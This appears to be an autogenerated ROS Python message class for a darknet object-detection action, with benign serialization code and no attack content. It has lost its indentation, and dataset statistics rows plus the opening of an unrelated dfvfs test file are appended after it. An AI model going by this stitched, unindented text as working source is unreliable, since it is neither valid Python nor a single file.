_md5sum = "98095af4078a4c5df88f8e6a4db52e32"
_type = "darknet_ros_msgs/CheckForObjectsAction"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
CheckForObjectsActionGoal action_goal
CheckForObjectsActionResult action_result
CheckForObjectsActionFeedback action_feedback
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalID goal_id
CheckForObjectsGoal goal
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
string frame_id
================================================================================
MSG: actionlib_msgs/GoalID
# The stamp should store the time at which this goal was requested.
# It is used by an action server when it tries to preempt all
# goals that were requested before a certain time
time stamp
# The id provides a way to associate feedback and
# result message with specific goal requests. The id
# specified must be unique.
string id
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsGoal
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Check if objects in image
# Goal definition
int16 id
sensor_msgs/Image image
================================================================================
MSG: sensor_msgs/Image
# This message contains an uncompressed image
# (0, 0) is at top-left corner of image
#
Header header # Header timestamp should be acquisition time of image
# Header frame_id should be optical frame of camera
# origin of frame should be optical center of camera
# +x should point to the right in the image
# +y should point down in the image
# +z should point into to plane of the image
# If the frame_id here and the frame_id of the CameraInfo
# message associated with the image conflict
# the behavior is undefined
uint32 height # image height, that is, number of rows
uint32 width # image width, that is, number of columns
# The legal values for encoding are in file src/image_encodings.cpp
# If you want to standardize a new string format, join
# ros-users@lists.sourceforge.net and send an email proposing a new encoding.
string encoding # Encoding of pixels -- channel meaning, ordering, size
# taken from the list of strings in include/sensor_msgs/image_encodings.h
uint8 is_bigendian # is this data bigendian?
uint32 step # Full row length in bytes
uint8[] data # actual matrix data, size is (step * rows)
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
CheckForObjectsResult result
================================================================================
MSG: actionlib_msgs/GoalStatus
GoalID goal_id
uint8 status
uint8 PENDING = 0 # The goal has yet to be processed by the action server
uint8 ACTIVE = 1 # The goal is currently being processed by the action server
uint8 PREEMPTED = 2 # The goal received a cancel request after it started executing
# and has since completed its execution (Terminal State)
uint8 SUCCEEDED = 3 # The goal was achieved successfully by the action server (Terminal State)
uint8 ABORTED = 4 # The goal was aborted during execution by the action server due
# to some failure (Terminal State)
uint8 REJECTED = 5 # The goal was rejected by the action server without being processed,
# because the goal was unattainable or invalid (Terminal State)
uint8 PREEMPTING = 6 # The goal received a cancel request after it started executing
# and has not yet completed execution
uint8 RECALLING = 7 # The goal received a cancel request before it started executing,
# but the action server has not yet confirmed that the goal is canceled
uint8 RECALLED = 8 # The goal received a cancel request before it started executing
# and was successfully cancelled (Terminal State)
uint8 LOST = 9 # An action client can determine that a goal is LOST. This should not be
# sent over the wire by an action server
#Allow for the user to associate a string with GoalStatus for debugging
string text
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsResult
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Result definition
int16 id
darknet_ros_msgs/BoundingBoxes bounding_boxes
================================================================================
MSG: darknet_ros_msgs/BoundingBoxes
Header header
Header image_header
BoundingBox[] bounding_boxes
================================================================================
MSG: darknet_ros_msgs/BoundingBox
float64 probability
int64 xmin
int64 ymin
int64 xmax
int64 ymax
int16 id
string Class
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsActionFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
Header header
actionlib_msgs/GoalStatus status
CheckForObjectsFeedback feedback
================================================================================
MSG: darknet_ros_msgs/CheckForObjectsFeedback
# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
# Feedback definition
"""
__slots__ = ['action_goal','action_result','action_feedback']
_slot_types = ['darknet_ros_msgs/CheckForObjectsActionGoal','darknet_ros_msgs/CheckForObjectsActionResult','darknet_ros_msgs/CheckForObjectsActionFeedback']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
action_goal,action_result,action_feedback
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(CheckForObjectsAction, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.action_goal is None:
self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
if self.action_result is None:
self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
else:
self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
_x = self.action_goal.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
_x = self.action_goal.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_h3I().pack(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs))
_x = self.action_goal.goal.image.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width))
_x = self.action_goal.goal.image.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_BI().pack(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step))
_x = self.action_goal.goal.image.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
_x = self.action_result.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
_x = self.action_result.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_B().pack(self.action_result.status.status))
_x = self.action_result.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_h3I().pack(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs))
_x = self.action_result.result.bounding_boxes.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs))
_x = self.action_result.result.bounding_boxes.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.action_result.result.bounding_boxes.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.bounding_boxes.bounding_boxes:
_x = val1
buff.write(_get_struct_d4qh().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id))
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
_x = self.action_feedback.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
_x = self.action_feedback.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_B().pack(self.action_feedback.status.status))
_x = self.action_feedback.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.action_goal is None:
self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
if self.action_result is None:
self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
end = 0
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_goal.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_goal.goal_id.id = str[start:end]
_x = self
start = end
end += 14
(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal.image.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_goal.goal.image.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal.image.encoding = str[start:end].decode('utf-8')
else:
self.action_goal.goal.image.encoding = str[start:end]
_x = self
start = end
end += 5
(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step,) = _get_struct_BI().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_goal.goal.image.data = str[start:end]
_x = self
start = end
end += 12
(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8')
else:
self.action_result.status.text = str[start:end]
_x = self
start = end
end += 14
(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.result.bounding_boxes.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.result.bounding_boxes.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.bounding_boxes.bounding_boxes = []
for i in range(0, length):
val1 = darknet_ros_msgs.msg.BoundingBox()
_x = val1
start = end
end += 42
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id,) = _get_struct_d4qh().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8')
else:
val1.Class = str[start:end]
self.action_result.result.bounding_boxes.bounding_boxes.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8')
else:
self.action_feedback.status.text = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs))
_x = self.action_goal.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs))
_x = self.action_goal.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_h3I().pack(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs))
_x = self.action_goal.goal.image.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width))
_x = self.action_goal.goal.image.encoding
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_BI().pack(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step))
_x = self.action_goal.goal.image.data
length = len(_x)
# - if encoded as a list instead, serialize as bytes instead of string
if type(_x) in [list, tuple]:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs))
_x = self.action_result.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs))
_x = self.action_result.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_B().pack(self.action_result.status.status))
_x = self.action_result.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_h3I().pack(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs))
_x = self.action_result.result.bounding_boxes.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs))
_x = self.action_result.result.bounding_boxes.image_header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.action_result.result.bounding_boxes.bounding_boxes)
buff.write(_struct_I.pack(length))
for val1 in self.action_result.result.bounding_boxes.bounding_boxes:
_x = val1
buff.write(_get_struct_d4qh().pack(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id))
_x = val1.Class
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_3I().pack(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs))
_x = self.action_feedback.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_get_struct_2I().pack(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs))
_x = self.action_feedback.status.goal_id.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_B().pack(self.action_feedback.status.status))
_x = self.action_feedback.status.text
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.action_goal is None:
self.action_goal = darknet_ros_msgs.msg.CheckForObjectsActionGoal()
if self.action_result is None:
self.action_result = darknet_ros_msgs.msg.CheckForObjectsActionResult()
if self.action_feedback is None:
self.action_feedback = darknet_ros_msgs.msg.CheckForObjectsActionFeedback()
end = 0
_x = self
start = end
end += 12
(_x.action_goal.header.seq, _x.action_goal.header.stamp.secs, _x.action_goal.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_goal.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal_id.stamp.secs, _x.action_goal.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_goal.goal_id.id = str[start:end]
_x = self
start = end
end += 14
(_x.action_goal.goal.id, _x.action_goal.goal.image.header.seq, _x.action_goal.goal.image.header.stamp.secs, _x.action_goal.goal.image.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal.image.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_goal.goal.image.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_goal.goal.image.height, _x.action_goal.goal.image.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_goal.goal.image.encoding = str[start:end].decode('utf-8')
else:
self.action_goal.goal.image.encoding = str[start:end]
_x = self
start = end
end += 5
(_x.action_goal.goal.image.is_bigendian, _x.action_goal.goal.image.step,) = _get_struct_BI().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_goal.goal.image.data = str[start:end]
_x = self
start = end
end += 12
(_x.action_result.header.seq, _x.action_result.header.stamp.secs, _x.action_result.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_result.status.goal_id.stamp.secs, _x.action_result.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_result.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_result.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.status.text = str[start:end].decode('utf-8')
else:
self.action_result.status.text = str[start:end]
_x = self
start = end
end += 14
(_x.action_result.result.id, _x.action_result.result.bounding_boxes.header.seq, _x.action_result.result.bounding_boxes.header.stamp.secs, _x.action_result.result.bounding_boxes.header.stamp.nsecs,) = _get_struct_h3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.result.bounding_boxes.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.result.bounding_boxes.header.frame_id = str[start:end]
_x = self
start = end
end += 12
(_x.action_result.result.bounding_boxes.image_header.seq, _x.action_result.result.bounding_boxes.image_header.stamp.secs, _x.action_result.result.bounding_boxes.image_header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end].decode('utf-8')
else:
self.action_result.result.bounding_boxes.image_header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.bounding_boxes.bounding_boxes = []
for i in range(0, length):
val1 = darknet_ros_msgs.msg.BoundingBox()
_x = val1
start = end
end += 42
(_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax, _x.id,) = _get_struct_d4qh().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.Class = str[start:end].decode('utf-8')
else:
val1.Class = str[start:end]
self.action_result.result.bounding_boxes.bounding_boxes.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8')
else:
self.action_feedback.status.text = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
_struct_d4qh = None
def _get_struct_d4qh():
global _struct_d4qh
if _struct_d4qh is None:
_struct_d4qh = struct.Struct("<d4qh")
return _struct_d4qh
_struct_h3I = None
def _get_struct_h3I():
global _struct_h3I
if _struct_h3I is None:
_struct_h3I = struct.Struct("<h3I")
return _struct_h3I
_struct_BI = None
def _get_struct_BI():
global _struct_BI
if _struct_BI is None:
_struct_BI = struct.Struct("<BI")
return _struct_BI
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2I = None
def _get_struct_2I():
global _struct_2I
if _struct_2I is None:
_struct_2I = struct.Struct("<2I")
return _struct_2I
| 41.428413
| 246
| 0.63943
| 5,149
| 37,327
| 4.398524
| 0.073412
| 0.06994
| 0.054398
| 0.043801
| 0.78369
| 0.781482
| 0.765233
| 0.765233
| 0.745717
| 0.741213
| 0
| 0.011961
| 0.218287
| 37,327
| 900
| 247
| 41.474444
| 0.764214
| 0.038123
| 0
| 0.806569
| 1
| 0.001217
| 0.203519
| 0.051167
| 0
| 0
| 0.00028
| 0
| 0
| 1
| 0.015815
| false
| 0
| 0.009732
| 0
| 0.046229
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
614f16ac6495c02324492c1a2db96f18b5c7f6dc
| 20,681
|
py
|
Python
|
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | 2
|
2016-02-18T12:46:26.000Z
|
2022-03-13T03:05:05.000Z
|
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | null | null | null |
tests/lib/raw.py
|
Defense-Cyber-Crime-Center/dfvfs
|
da2ccbc4c989ced5ad651057bd8f5a4b18af6d37
|
[
"Apache-2.0"
] | 5
|
2016-12-18T08:05:39.000Z
|
2019-11-19T21:18:00.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the storage media RAW image support helper functions."""
import unittest
from dfvfs.lib import raw
from dfvfs.lib import definitions
